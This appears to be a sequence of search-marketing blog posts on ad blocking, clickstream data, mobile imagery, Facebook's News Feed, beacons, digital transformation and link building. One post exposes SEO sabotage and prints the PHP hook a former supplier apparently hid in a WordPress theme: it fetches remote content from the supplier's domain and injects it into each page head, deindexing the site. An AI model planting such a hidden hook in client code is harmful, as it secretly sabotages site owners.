Five stats that sum up the rise of ad blocking

adblock plus video illustration

Love them or loathe them, ad blockers aren’t going anywhere soon, forcing digital publishers to sit down and have a serious rethink about their marketing strategies.

According to PageFair, which works with publishers to minimise the impact of ad blocking, web users are taking to blocking ads in their hundreds of millions.

To mark the publication of our first Zoom In report, Ad blockers: The lay of the land, we present five stats that we think best tell the story of ad blocking, but first, here’s one for free: according to the UK Association of Online Publishers, 65% of publishers see ad blocking as a threat to the publishing business model.

But is it all doom and gloom? Let’s see what else the stats have to say.

$41.4bn: the estimated global cost of ad blocking this year (PageFair, 2015)

Let’s get the bad news out the way first. Ad blocking is expensive for publishers, who need the ads to pay for the content they’re serving us, (often) absolutely free of charge.

According to PageFair, blocking those revenue-bringing ads will deprive the industry of $41.4bn by the end of this year. Ouch.

100m: number of Adblock Plus active users (Adblock Plus, 2016)

Perhaps the best known of the ad blocking brigade (and the biggest stone in the shoe of German publishing group Axel Springer, which has taken them to court), Cologne-based Adblock Plus was pleased to announce in May that it had more than 100 million active users, which it counts as active installations of its ad blocking platform.

That’s 100 million fewer devices publishers can serve their ads to. Food for thought.

22% of the world’s smartphone users are now using ad blockers (PageFair, 2016)

If the ad blocking battle began on desktop, the war will be in the realm of mobile.

A combination of easier access to ad blocking software on smartphones, and the greater availability of smartphones in emerging markets is driving this – 36% of smartphone users in Asia Pacific are blocking ads.

And apps aren’t beyond the reach of ad blockers anymore, as it’s now also possible to block in-app ads.

$9.50: cost of loading the ads on every day for a month (New York Times, 2015)

Many people block ads because they can be annoying. Others may be concerned about the malware they can carry. But another big reason is their loading times, and drain on mobile data – data that we’re paying for.

Last autumn the New York Times set out to discover just how much loading the ads on a range of news websites would cost on the average American mobile data plan over the course of a month.

It found that was the most data-hungry, costing just shy of $10 over the 30 days.

20% of people in the UK who have downloaded an ad blocker no longer use it (IAB, 2016)

Let’s end on a sweeter note for publishers. While ad blocker use is increasing rapidly in emerging markets, this stat suggests that the upward trend may start to slow in the UK.

IAB says the primary reason for users abandoning their ad blockers is switching to a new device, but the second most cited reason was a lack of access to content the users wanted – so perhaps the publishers’ strategy of walling off content until the user turns off their ad blocker is working.

Download your free copy of the Zoom In report Ad blocking: The lay of the land, which features exclusive insights from experts in digital media, publishing and technology, as well as the latest stats to bring you a well-rounded, easily digestible analysis of the ad blocking situation as it stands.

How to create insights from consumers’ click histories


Without any action behind it, data is just a bunch of numbers. Clickstream data is particularly valuable, providing insights about what consumers are doing.

Data alone does not lead to insights. Analyzed data backed by a hypothesis and placed in the right context, on the other hand, does.

Clickstream information is a particularly good set of data for marketers to examine if they want to understand their customers better and connect with them based on their actions.

The many benefits of clickstream data

With clickstream data, you can examine not only how customers are interacting with your brand, but also what they are doing before and after they arrive at your site.

Clickstream information is based on consumers’ actual click and browsing behaviors, with records of click-throughs and URLs visited collected in the order they occurred, giving marketers important, industrywide insight into online behavior, the customer journey through the funnel, and user experiences.

Rather than providing simple numbers of visits or sales, clickstream information reflects consumer behavior based on their activity and identifies areas companies could improve where the competition might be doing it better.

The insights garnered from clickstream data may not always match your hypothesis, but they are always useful if you ask the right questions.

Don’t collect data just because numbers are nice to fall back on. Instead, focus on collecting information like click history that is directly tied to your business objectives and key performance indicators.

Identify what you want to learn, and focus your collection and analysis on that specific data subset.

Make the most of your clickstream data

Creating actionable insights out of your data is essential to portraying a full and accurate picture of the customer journey. Maximize the effectiveness of your clickstream analysis by employing these three tactics:

1. Have a hypothesis

This is a minimum requirement for a data project to be efficient and lead to insights. Without a hypothesis, you’re just wasting time. The more specific you are in your data requests, the easier it is for your data team to pinpoint exactly what they need to pull, analyze, and provide.

You don’t have to be sure of the outcome, and the data may prove you wrong, but that’s OK. Just be sure your data team enters a project focused and that they reach a conclusion.

Let’s say you run a display campaign to drive awareness and clicks to your own site for a product. If you sell that product through third-party distributors, like Amazon or Target, your hypothesis might be that your display campaign is influencing purchase behavior and conversions on these third-party sites. Without clickstream data, it’s very hard to connect those two pieces and prove or disprove this hypothesis.

2. Tie your analysis to KPIs

Your analysis might reveal plenty of information about how consumers reach and interact with your brand or with your competition, but not all information yields actionable insights. You might find that consumers searching your website tend to search three times. That’s interesting, but you don’t gain real insights from it without understanding how their search activity affects their subsequent behavior or how it differs from consumer search activity on competitors’ sites.

Structuring your hypothesis and analysis around KPIs diminishes the risk of reaching insights that are not actionable. If your leading KPI is, say, trial subscriptions, look into the trial conversion flow of your competitors, and reverse engineer their customer journey through the funnel to detect conversion and abandonment trends at each step.

If the vast majority of consumers bounce during step three of five on your site (but not on your competitors’ sites), test out consolidation steps to improve the user experience and increase conversions.

3. Identify your output goals

Without a clear goal for what you intend to do with clickstream data, you cannot transform it into actionable insights. Are you studying customer journeys to optimize conversions or user experience? Are you looking for details about PR or case studies to grow brand awareness and generate leads?

Answering these questions and setting intentions for your data will help you in many ways, from filtering data requests from the get-go to guiding your thought process when focusing your data request and analysis.

By analyzing customers’ online actions – clicks, purchases on other sites, and their browsing history — with specific output goals, you reveal a world of insight into how they interact with your brand’s web properties, your competition, and how they react to your offering.

Don’t collect clickstream data just for the sake of collecting it. Understand what you want to investigate and how you can benefit from it. Make sure it’s relevant to your company, and then analyze clickstream data to better understand your customers’ actions and optimize their experience.

Marketers need to go beyond just the numbers and patterns that data provides if they want to successfully understand and connect with consumers. Focusing on customer actions will lead to a better understanding of your audience and what resonates with them, increasing the success of your marketing efforts and, ultimately, creating a better business.

This is an abridged version of an article published earlier this week on our sister site ClickZ.

How to use images to bring real world credibility to your digital presence


We all know the importance of imagery, especially on mobile. However, the focus on icons and the fear of oversized pages has caused many designers to forget the power of pictures.

The right emotive photograph of the right proportions that loads rapidly is a fantastic way to bring your offline identity in a homogenous digital world.

In the physical world, many people love (or love the idea of) shopping in independent shops – music shops, fashion, books, surf shops, bicycles, delicatessens etc. – eating in independent restaurants and/or staying in independent hotels. There’s some joy in their individuality, expertise, quirkiness, familiarity. However, this differentiation often fails to translate into the digital world.

This is particularly the case in retail. Too often websites are simply a list of products, often the same or similar products as can be found on plenty of other retailers… sometimes at a better price, with little (bar a logo) to express the retailer’s unique selling proposition (USP) that is so evident offline.

A perfect picture is worth a thousand words

On the high street consumers are attracted into stores, restaurants, bars by what they see. The façade, name, logo, and any call-to-action, e.g. 50% off all helps gain attention, but mostly it is what we see inside.

This is why all shops and many other establishments have big windows. Sometimes it’s just a showcase window display, but often the window provides the opportunity to gaze into the soul and grasp the identity of the place.

It is this unique identity that most websites lack online and really lack on mobile.

Take a look at the mobile site of Daunt Books below. That photograph of the flagship London store tells you more about this retailer than any “about” section, review or product catalogue.

It’s there: front and center, whatever the device. You don’t need to ever have visited the real store to know this isn’t Amazon, Walmart, Tesco or Barnes & Noble.

Daunt Books is not a perfect mobile experience, but it is considerably better than many independent retailers (plenty of chains also) and, with those images, it is certainly one of the most elegant.

If you’ve got it, should you flaunt it?

So while we’re shopping in London, let’s visit the iconic department store Liberty. The image below shows the different experiences that greet the visitor to the physical store and to the mobile site. To find a picture of the store on the mobile site you need to look in the location tab.

Then let’s skip across the channel to Paris, to compare the gorgeous interior of Galeries Lafayette, pictured below, with its digital presence.

As you visit more sites of the world’s iconic department stores, it quickly becomes clear that they have all taken the decision to focus solely on product, with a utilitarian (though ironically not always user friendly) mobile web presence.

Try this: put your finger over the logo on any site (web or mobile), would you recognize the site? Is there anything that gives a hint of retailer’s real world physical presence, heritage or brand? Is there anything that demands: when I’m in New York, I’m going straight to this store?

Try Bergdorf Goodman, Bloomingdale’s, or any other of New York’s temples to shopping.


Does this matter?

It seems surprising, when you have an iconic physical presence not to capitalize on it online, just to remind the customer of the heritage. But these department stores have strong brands, perhaps they feel the logo (with the look and feel of the site) is all that is required to give customers a sense of place, belonging and loyalty.

And of course, you can be sure that every retailer has conducted methodical tests to see what works best with mobile customers. Right?

But what about smaller stores, that aren’t such well-known brands?

Pick a list, any list.

Here’s the test.

Everybody loves a best of list. Best hotels in Singapore. Best restaurants in Berlin. The best surf shops in the world. Best coffee, boutique, pubs… whatever your poison.

All best of lists have a tried and tested format.

  • Name of store/outlet/place
  • Photo of store
  • Description of store
  • Name of store
  • Photo of store
  • Etc…

For example, take a look at: America’s 15 Greatest Independent Record Stores according to Gear Patrol. This was chosen purely at random for this test.

Record stores are great example because they look fantastic in photos, even if you are not a big fan. If you are a fan… you can almost smell the vinyl. But all sorts of outlets look great in a good photograph, inside or storefront: skateboards mountain bikes, shoes, garden nurseries, bars, restaurant, hotels… That’s why we love the tried-and-tested list format.

The question is: when you tap through to this outlet that looked so great in the physical world, do you get a mobile (or PC) experience as compelling that image? Because, let’s face it, no normal person is going to physically visit 15 record stores from San Francisco to Brooklyn; but plenty of people might indulge in a little m-commerce.

The image below shows a screenshot of our record store list on the left (a tablet view, much reduced), with screenshots from various examples, good and bad, mobile friendly and not, from the sites to which the list linked (the screenshots are taken on a Samsung S6, but iPhone 6 looks similar using Mobilizer, which is a freemium tool).


How to research

Conduct tests repeatedly on all best of lists you can find. You can use directory services such as Yelp or TripAdvisor, but these are less fun or interesting than random curated lists.

The test:

  • Pick lists related to, and unrelated to, your business.
  • Try best in the world and by country, city – not just your own.
  • Conduct it on a mobile devices – ideally more than one type of device.
  • Don’t just do it on WIFI, do it at the bus stop, on the train, in the pub.
  • Rate each sites on immediate impact. Does it grab your attention and draw you in? Why?
  • Did the images make the site slow to load? Enough time to make you bored?
  • Do images justify the real estate they take up on the screen?
  • Then conduct a more thorough investigation.
  • Then back up your findings with user testing.

Mobile as a brochure for your real world experience

Arguably it is even more important to capture the essence of your physical presence, if mobile (and digital) is a vehicle to drive and/or pay for visits to your business in the real world.

If you are in the any of the following kinds of businesses, it’s not just a very good idea, it is, arguably, an imperative to use powerful, compelling imagery:

  • Hotels, restaurants, bars and clubs.
  • Museums and galleries.
  • Entertainment e.g. sports centers, bowling, ice skating.
  • Shopping centers.
  • Locations – countries, cities, neighborhoods, parks, beaches.

Not only do customers need to know what they are committing to/purchasing, i.e. is it their sort of place, people, good time; but also what the place actually looks like, so they can find it.

The following image shows four mobile experiences for the first five featured on Top 10 Museums and Galleries according to National Geographic. Two of the five, Le Louvre, Paris, France; and The Acropolis Museum, Athens, Greece (not pictured) lacked a mobile-friendly presence.

The homepages of The Smithsonian Institution, Washington, D.C. USA; State Hermitage, St. Petersburg, Russia; and The British Museum, London, England all suggest quite different approaches to mobile – including use of imagery.


Now let’s look at hotels:

The following image shows the four results randomly chosen from Top 10 good-value hotels in Singapore according to The Guardian.

The images are iPhone 6 screenshots using Mobilizer. While all sites appeared to be mobile-friendly, Mobilizer found some of the sites slow to load and other sites on the Guardian list impossible to load. This may indicate some usability issues, which may or may not be caused by the images used.


Is your picture worth its weight/wait in gold?

A quick test of the four museum sites highlighted above using the excellent WebPagetest revealed that the best performer over a mobile network (at the time of the test) was the homepage of The Smithsonian. Looking at the images you might guess that, but the other results were less predictable.

  • The Smithsonian had a mobile load time of 2.3 seconds.
  • British Museum: 4.1 seconds.
  • The Louvre: 5.8 seconds.
  • State Hermitage: 13.3 seconds.

With the exception of Smithsonian, the WebPagetest results suggested that one of the issues was images and suggested compressing the images should improve performance for all three.

Images will always come at a small cost when it comes to performance on a mobile network. It is essential to test your site to check that images are not causing unnecessary delay to page load. Consumers are becoming increasingly intolerant of slow mobile sites, so you must take measures to identify and reduce performance lag.

It is absolutely imperative that you test. Read this guide to testing the mobile-friendliness and performance of your site.

The following tools will help expose any issues, including image problems:

  • Site Speed Data tool in Google Analytics.
  • SEMRush
  • Google Mobile Usability Report.
  • Google Mobile-friendly test.
  • Bing Mobile Friendliness Tool.
  • Google PageSpeed Insights.

It is absolutely imperative that you also user test to establish if your imagery works with the users and if it justifies any latency in page performance. Read this guide to how to user test.

Among other measures, you should:

  • Use onsite and remote user testing.
  • A/B testing.
  • Heatmaps, such as Clicktale.

Read the full report: DNA of a Great M-Commerce Site Part 1: Planning

Five most interesting search marketing news stories of the week

50 cent pitching wildly

Look, I’ll level with you, I’ve pretty much just spent the week staring open mouthed at the internet while one more UK political crisis collapses into the next. You probably have too.

It may not have affected your work, but you’ve probably felt less of a need to bingewatch anything particularly dramatic on Netflix.

So basically this is all the latest search-related news that you may have missed over the last week, and frankly nobody would have blamed you if you had. Heck, Google could have announced a new line of sentient killer robots built suspiciously like Arnold Schwarzenneger and nobody would have noticed.

Well hey, let’s see what happens…

Facebook tightens its News Feed algorithm again, publishers feel the pinch

In what is the equivalent of a bank manager shouting at “lousy freeloaders” and emptying a bag of broken glass onto the ground to stop them from sleeping in the doorway, Facebook has strengthened its News Feed algorithm in order to show users fewer posts from publisher pages.

But, as this Buzzfeed article puts it so eloquently, it has been a public vote – and one against seeing more news.

Sure you can argue that Facebook is merely doing this to generate ad revenue from branded pages, but ultimately if its 1.65 billion users aren’t engaging directly with published news content, then it’s not doing Facebook any favours to keep it at the top of News Feeds.

Well that’s depressing. Don’t worry, there’s a 50 Cent Gif in a minute to cheer you up.

Google’s Keyword Planner tool became even more inaccurate

As Chris Lake reported this week, the numbers in Google Keyword Planner have always been somewhat vague, as they’re often rounded up and end with at least one zero.

Sadly these numbers will become even less precise in the very near future as Google has begun combining related terms, pooling them all together and reporting one larger number instead.

“You longer can you separate the data for keyword variants, such as plurals, acronyms, words with space, and words with punctuation. As such it would be easy to get a false impression of search volumes, unless you’re aware of the change”

The most common backlinks are natural

In Glen Allsop’s recent analysis of 1,000 search results, he discovered which kinds of links are most valuable for high rankings.

Natural (or earned) links top the chart of most common backlinks:

prominent backlink types viperchill

The research also found that the volume of backlinks does not correlate with ranking, but the variety of linking domains and longer word counts do help.

Check out the complete research here: State of Link Building 2016.

Google’s local 3-pack may now include paid listings

As reported in SEJ this week, Google’s organic listings may begin showing ads for certain localised searches.

Here’s the crappy photo I took of the presentation showing the 3-pack with 1 ad. #SMX #SMXLocal

— Joy Hawkins (@JoyanneHawkins) June 21, 2016

As SEJ lead news reporter Matt Southern suggests:

“The ramifications of this change mean that any business can become featured in the local pack just by paying their way to get there. That’s good news for advertisers, but could spell bad news for local businesses who have worked hard to earn a spot in the 3-pack.”

Goodbye crappy lyric sites, Google has taken over

If you’re a regular searcher of song lyrics, they will now be served directly on Google SERPs thanks to a multi-year deal between Google and Toronto-based lyric licensing company LyricFind.

It has already begun…

google song lyrics

Although Google horning in on anybody’s racket is normally something to be wary of, this is actually quite a good development, as lyrics websites are pretty awful and awash with horrible advertising.

Sadly it doesn’t have the lyrics to 2 Unlimited’s ‘No Limits’ yet, but that’s probably understandable.

Facebook News Feed update: how #Friendmageddon will affect publishers

SocialFlow organic reach Facebook drop

Facebook has announced a new change to its News Feed algorithm, favouring personal posts over news stories, in an attempt to maintain its personal element. What does this *really* mean for publishers though?

Facebook is all about connecting people with their friends and family and despite attempts to divert from its original concept, it’s not ready yet to leave it aside. That’s why it decided to downplay stories from publishers on users’ news feed, in order to promote more personal stories from their favourite people.

This announcement was not warmly welcomed by publishers, as it means that organic reach will probably drop even more (as if it wasn’t already low) and it will be even more challenging from now on to make it to a user’s news feed.

RIP organic reach?

Organic reach was already on decline over the past few years and even before the latest algorithm change, SocialFlow observed a drop of 42% from January to May, which was alarming for Page managers.

It’s apparent that organic reach was becoming more challenging and only engagement and relevance could improve it. However, if there was already a drop of 42% in posts’ reach from January to May, what could we expect from now on?

Image source: SocialFlow

If Facebook is further promoting personal stories over news and brand posts, will we even able to talk about organic reach anymore?

Facebook confirmed in its announcement the possibility of seeing a reduced organic traffic:

“Overall, we anticipate that this update may cause reach and referral traffic to decline for some Pages. The specific impact on your Page’s distribution and other metrics may vary depending on the composition of your audience. For example, if a lot of your referral traffic is the result of people sharing your content and their friends liking and commenting on it, there will be less of an impact than if the majority of your traffic comes directly through Page posts. We encourage Pages to post things that their audience are likely to share with their friends.”

Publishers are starting to worry about the recent change and this brings about the need to re-evaluate their content strategy, in an attempt to maintain a successful Facebook presence.

Aiming for value and relevance

In Facebook’s own words:

“The goal of News Feed is to show people the stories that are most relevant to them.”

It’s not just about promoting personal stories then, but it’s also about highlighting the content that is relevant for every user. This means that Pages may still maintain their organic reach, provided they understand their audience.

It is becoming more important than ever for a publisher (and any Facebook Page) to post informative and relevant content for its audience, in a way that it will maintain engagement and ensure posts are still visible on News Feeds.

More over, shareable content, what we also call ‘viral’, will still be important, as this is the organic way to ensure that a page’s reach is increased. Creative, unique and authentic content is always appreciated and this is the only way to maintain the organic reach in the post-algorithm era.

This may require a more extensive analysis of the Page and each post’s performance, although we assume that native videos will still be more important than other types of content. Facebook was quite clear on its preference of native content so this might be a good start for your experimentation over the forthcoming months.

Source: Buzzfeed Pound data

Pay for traffic

It is inevitable that publishers will follow marketers in the ‘pay to play’ game on Facebook, in order to maintain their reach, but is every publisher able to do so? And what does this mean for smaller sites?

It won’t be an easy task for a small publication to maintain a Facebook presence without paying to promote (or boost) a post. This doesn’t mean that every small publisher should abandon Facebook, but it may become more challenging and there’ll be a need for more creative solutions.

Maybe it’s the right time for every publisher to understand that heavily depending on Facebook for traffic is not working anymore and it might be a good idea to consider further options, or simply to focus on other aspects of content marketing.

A change in news consumption?

A recent survey by Pew Research Center indicated that 62% of US adults are using social media to keep up with the news and Facebook is by far their first choice, with 67% of them using it for their news updates.


Image source: Pew Research Center

After the News Feed update, people won’t see the same amount of news stories on their feed and will ultimately affect the success of publishers’ posts.

Beware, this is not the end for publishers on Facebook, but it does call for more authentic, interesting, appealing, engaging content, rather than circulating the same old story across all publications.

Once again, big publishers will probably be less affected by this update, due to the authority, the budget and the engagement they already have.

People will not stop consuming content through Facebook, all publishers need to do is find is the right way to ‘get access’ to their users’ feeds.

(Hopefully the focus on engagement and virality will not lead to posts of lower quality, simply seeking to grab the audience’s attention)

Boosting the “echo chamber”

Another issue to consider is the filter bubble that Facebook has built over the year and how it only grows bigger with all the updates.

People are exposed to people, posts, stories that are relevant to their interests, their beliefs, their experiences and this ultimately affects their broader perception of the world.

Eli Pariser mentioned in his book ‘The Filter Bubble: What the Internet is Hiding From You‘ back in 2011:

“Your computer monitor is a kind a one-way mirror, reflecting your own interests while algorithmic observers watch what you click.”

Meanwhile, Facebook published a post on its News Feed Values and mentions among others:

“Our aim is to deliver the types of stories we’ve gotten feedback that an individual person most wants to see. We do this not only because we believe it’s the right thing but also because it’s good for our business. When people see content they are interested in, they are more likely to spend time on News Feed and enjoy their experience.”

This sums up its concept, the news feed updates and how our news consumption is changing. As more and more people use the platform to keep up with the news, and as Facebook keeps pushing personal and relevant stories, publishers are also becoming part of a changing reality, which affects both the creation, but also the distribution of their future stories.

What’s the next step for publishers on Facebook?

There’s no need to panic (yet) regarding Facebook’s new update, but it may be a good idea to start examining your audience and the reactions your posts trigger, in order to be ready to deal with the new #Friendmageddon.

Every site will feel the need to analyse its current marketing practices, in order to spot the opportunities for further development to maintain the referral traffic that Facebook may offer.

Whether you already have an engaged audience or not, Facebook kindly reminded us once again that nothing is for granted. Time to adjust our social practices once again then.

giphy (69)

Why you may need to be aware of booby traps when hiring a new SEO

The online marketing world can be somewhat of a wild west in many regards, with SEO at the center of the chaos.

Of the thousands of providers across Australia there are no shortages of promises, case studies and packages available for every business size. The central premise of SEO is that you will get long-term sustained traffic for your investment.

The industry as a whole has a simple paradox that it must deal with, if they do their job properly, they are theoretically not needed anymore, and then stand to lose a customer. Meanwhile, if they do not do their job properly they are guaranteed to lose a customer.

Within 24 hours of one of my SEO clients deciding they were happy enough with their rankings and deciding to pull out of their retainer, one of my other clients had finally finished their 12-month web design and SEO package with their initial provider.

As I was asking myself “how can I adapt my business to allow for sudden client satisfaction,” my other clients were in the process of having their site migrated to my server.

I arrived at my client’s office to begin a day’s work, and we checked the rankings for their site. The migration had been completed a few days prior and had gone through smoothly.

That abysmal feeling of dread came, as we saw that the site couldn’t be found nestled in its top positions for any of it’s search terms anymore.

The weird thing, as I checked for manual penalties or de-indexation by searching, it became apparent that not every page had been dropped. Only the homepage so far.

This at least narrowed the search down, and meant that I could check the source code for the homepage, and see if there was anything odd going on.

Sure enough, there it was:

This line of code tells Google and other search engines to remove the website from their index, rendering it unfindable. It has its time and place in day-to-day web design and marketing, but clearly does not belong on the homepage of a website that is trying to gain traffic and potential customers.

I decided to fix the problem first and then later deal with the lingering question of ‘why has this code suddenly turned up?’

Once the hunt had begun for where exactly this code was generating from, I became less and less convinced that this was some sort of accident.

Searching within any of the website files for ‘noindex’ turned up nothing, almost like the code wasn’t actually in there anywhere. Even downloading the entire set of website files and running them through a dedicated file searching tool, we couldn’t find a single instance of ‘noindex’ anywhere within the website.

Sure enough though, the noindex code was in there somewhere, and not just the front page it would seem. Google had dropped the front page but had not yet gotten around to deindexing the rest of the pages, even though every page had the code.

The webhosting company that oversaw the migration assured me that they had simply taken the site files and placed them on a server, never touching any of the code. They joined the hunt.

We eventually discovered the source of the code; it was both ingenious and simple.

I received an email from the developer in charge of migrating the site:

We have looked through the code and found the following lines in the themes functions.php file…

add_action(‘wp_head’,’sidebar_config’, 1, 3);
function sidebar_config()
$output = file_get_contents(‘http://robots.clients.(*previous suppliers domain*)’);
echo $output;

Disabling only these has resulted in the nofollow,noindex disappearing.

Note that this specifically references to connect to and retrieve a file from robots.clients.(*previous suppliers domain*) and then output the code into your site.”

As I spoke with the developer, he informed me, that this code is only triggered if the site is no longer being hosted on the previous supplier’s website.

The previous suppliers dismissed it as a mistake, initially trying to tell me that it must have happened during the migration, and then later saying that they may have accidentally left the code in there, who knows.

One thing is for sure, these guys who have been in business much longer than I have, know their game well.

When a client drops me, I ask myself “what could I have done to keep them happier?” and “should I perhaps package my services better?”

When a client drops them, their entire site gets deindexed.

I think I prefer the soul-searching quest to provide value that people don’t walk away from, rather than the vindictive attempt to hedge a sites rankings to my server.

How are beacons going to affect search marketing?

edgelands barbican

Recently I’ve been reading a lot about the effects beacons and proximity marketing may have on search strategy.

(I actually work for a company that makes beacons and management software, so it’s not just me being boring).

I’ve found little doubt that it will bring some very fundamental changes to the way we reach customers, and the type of targeting and data management we’ll need to master in order to do things properly.

Although perhaps not in the way you might think…

Improving proximity results

Search Engine Watch has spoken about beacons a lot in the past, but just in case you need a refresher, a beacon is a tiny device that can transmit a signal to any Bluetooth device in range – phones, fitness bracelets, headphones, smartwatches etc.

Usually this happens through an app (although Google in particular are taking steps to remove this friction and enable direct device communication), and before the privacy police wade in, it’s all completely opt-in.

It certainly has some obvious ramifications for local search.


In the past, we’ve largely been limited to areas defined by map coordinates for localisation. These are fine for locating buildings, but not so hot once people actually enter a space.

Beacons have a big advantage here because they get that location down to an area a couple of metres across, and they allow you to transmit and receive data in realtime. If I’m standing by the apples in your supermarket, you can fire me a coupon.

I’m using that example on purpose by the way, and I’ll explain why in a moment.

Beacons don’t need to be interruptive

For marketers, there seems to be an assumption that beacons are an interruptive marketing tool.

Retail couponing is the most obvious use-case after all, but just as early ecommerce sites learned, couponing is no way to build a successful business. And as the publishing industry is learning, interruptive marketing… just isn’t very good really. People don’t like it in most cases.

As I say though, this is only an assumption. The real value of beacons is actually almost the complete opposite of interruptive.

It is in contextual interactions, which usually rely on either an active request from a user, or passive scanning and data aggregation by the person deploying the beacons.

In other words, if I visit a museum, download it’s app and enable push notifications while I’m there, then I’m actively searching for information abut my location.

If not, then I can still be monitored as an anonymous device that is moving around the museum. Once this data is collected, there is a lot of potential value. Maybe it’s time to move that Rodin statue to a more prominent position (possibly next to the gift shop).

Search will need to become hyper-relevant in an open beacon marketplace

So what does this mean for search?

Currently, a lot of local search isn’t that great. There are plenty of fine examples, but there is certainly an adoption curve, particularly for small businesses.

Do a quick search for something like ‘Bike shop, Shrewsbury’ and you can usually see which businesses have a lot of low-hanging SEO fruit that they just aren’t optimising for.

This is a missed chance, but it is usually being missed because of a lack of familiarity and time. People who are busy running a hardware store don’t often have time or money to really concentrate on good SEO.

As beacon deployment becomes more widespread (and it is going to be), this situation is going to change for the user on the ground. App networks and beacons deployed as general infrastructure in more locations mean that local optimisation is opened up to more players, with more resources. Why should our local bike store be wasting time optimising when Raleigh can be doing it for them?

Local SEO will begin to be a wider concern not for the locations themselves, but for the companies that sell through those locations. And those companies have the resources and processes available to start doing a really good job.

There is however, still a place for the location itself in all this, and that is in adding contextual value, which may not come from purely commercial campaigns.

Recently I visited Edgelands at the Barbican in London, where one of our clients has deployed beacons that guide visitors around the interesting (and slightly confusing) internal space.

The interesting thing here is that it occurs through sound, so that visitors are able to view their surroundings, rather than keeping their eyes glued to their phone screens. It adds context while keeping the visitor engaged with the physical space, rather than having the two vie for attention.

With the rise of experience stores, this is going to become a more important point of differentiation over the next few years. Customers won’t want distracting alerts and pop-ups, they’ll want something that provides a richer experience.

From the marketing side, providing these will become a way to deepen brand affinity as much as increase immediate sales.

Search is about to leave its silos behind

This makes location a strange, mixed bag for search. On one side, brands providing advertising through app networks and beacon fleets owned by third parties (in my opinion, telcos are currently best placed to handle and benefit from large scale deployment, as they already have large data networks and physical locations).

In many cases, this will be about hyper-localised PPC campaigns. On the other, locations providing realtime SEO, with a shifting set of keywords based on whatever is currently happening in-store (or in-museum, or in-restaurant for instance).

It means that we’ll have to get better at aligning our data and working out which signals really matter, and we’re going to need to get insanely good at management and targeting.

I hate to use this word, but search will need to become more holistic, and even more aligned with marketing. There’s a huge opportunity here for search marketers, customer experience, data management and more.

Google’s Joris Merks on the importance of leadership for digital transformation


Joris Merks is Head of Digital Transformation, Northern Europe at Google, and works with companies to embed digital-first thinking into their strategies.

He’ll be participating in a Google Squared webinar tomorrow (June 30), looking at how to drive a culture of innovation in your company.

Can you tell us a little about your role at Google?

I am EMEA Head of Curriculum design in the Google Digital Academy team. That means I work with a team and vendors to build workshops and education initiatives that help Google’s advertisers understand what the impact of digital is on their business and help the feel equipped for digital transformation.

What does digital transformation mean to you?

I look at digital transformation as a chain reaction of experiments that continuously helps companies to understand how to make the best use of new technology.

In this way they stay in tune with their customers, who are also using digital technology, keeping their businesses ready for the future.

What should the first steps be in a process of digital transformation?

It starts with a clear vision from company leaders of where technology is going and how that could affect the business.

Then these leaders need to give strong signals to people in the company about which challenges need to be fixed and a culture that rewards experimentation and entrepreneurship needs to be created.

Without this culture, people aren’t very likely to invest in new experiments. This is because any experiment with new technology is always more work and more risk compared to just doing what you always did. People won’t be wiling to pick up more work and risk if there is nothing in it for them or if they might even risk losing their job or bonus when an experiment fails.

Should companies centralise digital functions, or should these be distributed across various teams/departments? What are the pros and cons?

I think it depends on the stage of development a company is in and on the type and size of company. Companies with a digital-focused business model obviously should have centralised digital functions.

Smaller companies tend to have functions where digital and traditional marketing are embedded in the same teams.

Large companies that have heritage in the offline world and are in transformation tend to start out with specialized digital teams, which is good to make sure you ramp up fast enough. However, at some point in the digital transformation new and old teams must break through their silos because they are in the end serving the same customer and should provide a seamless journey across channels.

I believe eventually the differentiation between the two worlds will go away and all marketers will have a digital mindset. For the sake of ramping up fast it can however make sense to have a period where digital is a separate skill set in the organization.

How much of digital transformation is about technology and how much is about culture?

I’d say it is equally important and next to technology and culture there are also factors such as creativity, knowledge, organisational structure and strategic processes.

For example, if new technology arises, creative people are needed to find out what cool and useful things you can do with that technology.

The people that are our creatives and the people that understand tech are however often not the same type of people, so the art is bringing them together to come up with new ideas to experiment with.

The big trap with digital is that it can be treated too much as a technological development and that focus is a lot on data. With that focus digital will always stay a specialism in the company and the company will never have a fully digital mindset.

There are many obstacles facing brands as they examine new digital tactics and technology (e.g. legacy systems). How do you drive digital transformation in such an environment?

I think sometimes big tough decisions need to be made in many areas at the same time. That is definitely true for legacy systems.

For instance brand and digital departments might be using different tools to manage their campaigns. That means you can never have a single view on the customer, which again means you can never be customer friendly in your advertising.

Someone then needs to make the decision to go for one holistic approach. That will require short term investments of time and money but is a crucial decision in order to be ready for the future and not lose your business in the long run.

Those decisions typically require strong leadership and vision. Without that it is very easy to keep focusing on those things that deliver you short term business without making the efforts needed to keep your long term business.

Which companies do you see as great examples of businesses which have embraced digital? What are the common factors in their approaches?

There are many of such examples. I think the key thing they all have in common is strong visionary leaders.

If people we work with find it get stuck in digital transformation, that is almost always because the way they are incentivised, their targets, their bonuses and career opportunities are driven too much by short term business results.

Those are the companies that will one day get an extreme wake up call because a new competitor will come out of nowhere with a new business model using new digital technology in smart ways and winning customers at high speed.

Where does data fit into digital transformation?

Despite the fact that I think the focus has been too much on technology and data, data definitely is becoming more important. I think no one can deny that.

I always advocate the balance between data, mind and heart. Data to measure everything you can measure, mostly the proven successes so you can optimise them further.

Mind is needed to look ahead into the future, assess how your business may be affected by new developments and craft the right experiments to be ready for that future.

Data isn’t very good at helping you with that because data is always based on the past. Even when models make predictions they are always based on past data. The heart is needed to recognise the moments when someone comes up with a great creative idea of something cool you can do with new technology.

On those moments you shouldn’t ask how much money you will earn from it. If the idea is fundamentally different from anything you tried, you can’t know. If, however, your heart starts pounding, that probably means it is a great idea worth exploring. You can bring the measurement in afterwards, but don’t kill the idea upfront due to lack of good data.

Joris will be taking part in a Google Squared webinar tomorrow, looking at the five fundamental limitations of data that create challenges in digital transformation. You can sign up for the webinar here.

Which kinds of links are most valuable for high rankings?

prominent backlink types viperchill

What does link-building look like right now? What tactics work? Is it all about quality content or do more shady tactics still get results?

Glen Allsop of ViperChill posted another excellent article recently, distilling the findings from his own manual analysis of 1,000 search results.

He looks at the link structure of various sites, trying to ascertain the kinds of links that help some sites rank, the tactics (white hat and not-so white hat) used by sites to rank, and the effects of factors like number of links and word count.

It’s a monster of a post – more than 5,000 words I’d guess – but truly worth a read. All I’ll do here is list some of the key lessons from Glen’s analysis.

The most common backlinks are natural

Glen found that natural (i.e. earned) backlinks top the chart, which is as it should be.

However, the study also found that many high ranking websites have some very low quality backlinks. They are things like forum pages, blog comments, and non-English Blogspot blogs. They’re not earned, but can be easily created.

